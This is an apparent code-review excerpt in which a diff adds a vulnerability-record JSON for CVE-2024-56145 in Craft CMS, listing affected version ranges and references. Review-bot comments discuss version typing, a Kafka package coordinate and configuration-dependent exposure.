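Review bot: The Maven coordinate in `"packageName": "org.apache.kafka:kafka"` may not be one that deployments actually resolve; as far as I know Kafka is published under artifact ids such as `kafka-clients` and the Scala-suffixed `kafka_2.x`, so package-level matching on this name could miss affected installs. Worth confirming, and if so listing each affected coordinate as its own `affected` entry with the same two ranges. The ranges themselves agree with the description's fixed versions 3.7.2 and 3.8.1. The description limits exposure to SCRAM over `SASL_PLAINTEXT` listeners, which the record cannot express, so a match still needs that listener configuration checked.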
@@ -0,0 +1,51 @@
+{
+ "additionalMetadata": {
+ "cna": "github_m",
+ "cveId": "CVE-2024-56145",
+ "description": "Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. Users of affected versions are affected by this vulnerability if their php.ini configuration has `register_argc_argv` enabled. For these users an unspecified remote code execution vector is present. Users are advised to update to version 4.13.2 or 5.5.2. Users unable to upgrade should disable `register_argc_argv` to mitigate the issue.",
+ "reason": "Added CPE configurations because not yet analyzed by NVD.",
+ "references": [
+ "https://github.com/craftcms/cms/commit/82e893fb794d30563da296bca31379c0df0079b3",
+ "https://github.com/craftcms/cms/security/advisories/GHSA-2p6p-9rc9-62j9"
+ ],
+ "upstream": {
+ "datePublished": "2024-12-18T20:37:34.301Z",
+ "dateReserved": "2024-12-16T18:04:39.983Z",
+ "dateUpdated": "2024-12-18T21:10:48.315Z",
+ "digest": "fd488b59f0371d0786fa3cda8221ea5d372155c5234137065b1bae8e5d275a6f"
+ }
+ },
+ "adp": {
+ "affected": [
+ {
+ "collectionURL": "https://packagist.org",
+ "cpes": [
+ "cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:php:*:*"
+ ],
+ "packageName": "craftcms/cms",
+ "packageType": "php-composer",
+ "product": "cms",
+ "repo": "https://github.com/craftcms/cms",
+ "vendor": "craftcms",
+ "versions": [
+ {
+ "lessThan": "4.13.2",
+ "status": "affected",
+ "version": "4.0.0-rc1",
+ "versionType": "custom"
+ },
+ {
+ "lessThan": "5.5.2",
+ "status": "affected",
+ "version": "5.0.0-rc1",
+ "versionType": "custom"
+ }
+ ]
+ }
+ ],
+ "providerMetadata": {
+ "orgId": "00000000-0000-4000-8000-000000000000",
+ "shortName": "anchoreadp"
+ }
+ }
+}
\ No newline at end of file
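Review bot: Both ranges start at a pre-release (`"version": "4.0.0-rc1"`, `"version": "5.0.0-rc1"`) but declare `"versionType": "custom"`, which leaves the ordering of `-rc1` against the final release up to each consumer. The Kafka record in this commit uses `"versionType": "semver"`, and the same value here would make the lower bounds unambiguous, if the tooling accepts it for this package type. The description also makes exposure conditional on `register_argc_argv` being enabled in php.ini, which a version range cannot express, so a match still needs that setting checked.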